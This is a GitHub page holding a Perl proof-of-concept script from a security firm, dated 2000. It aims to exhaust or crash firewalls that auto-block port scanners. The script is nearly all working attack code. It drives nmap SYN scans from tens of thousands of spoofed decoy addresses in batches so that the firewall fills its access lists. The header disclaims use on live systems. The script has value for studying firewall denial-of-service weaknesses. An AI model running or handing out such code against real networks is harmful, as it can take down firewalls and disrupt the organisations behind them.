-
Notifications
You must be signed in to change notification settings - Fork 9
/
decoyblues.pl
48 lines (40 loc) · 1.34 KB
/
decoyblues.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/perl
# PERL script to possibly kill firewall systems that actively block IP
# numbers if the system detects that the IP is scanning more than 20 ports
# on a network behind the firewall. Works by basically creating a lot of
# decoys with nmap. Router/firewall will try to block all the (decoyed) IP
# numbers, eventually running out of access list/packetfilters, and possibly
# crashing, or overwriting access lists. Make sure your target is a machine
# behind the firewall. Requires nmap.
# This is a proof of concept code - not to be used on live systems.
# Standard disclaimer etc..
# Roelof Temmingh 2000/10/20
# [email protected] http://www.sensepost.com
if ($#ARGV != 0) {die "usage: decoyblues target_behind_firewall\n";}
my $target=@ARGV[0];
my $passed;
sub gonmapactive
{
$passed=@_[0];
# add my IP right at the end of it all
$passed=$passed."ME";
system "nmap -T Aggressive -D $passed -sS $target -p 20-40\n";
}
$count=0;
for ($a=1; $a<255; $a++){
for ($b=1; $b<255; $b++){
$count++;
$add=$add."196.$a.$b.1,";
# when we got a 100 decoys, ship it off to nmap
if ($count==100) {
&gonmapactive($add);
$add="";
$count=0;
}
}
}
# Spidermark: sensepostdata
------------------------------------------------------
Roelof W Temmingh SensePost IT security
[email protected] +27 83 448 6996
http://www.sensepost.com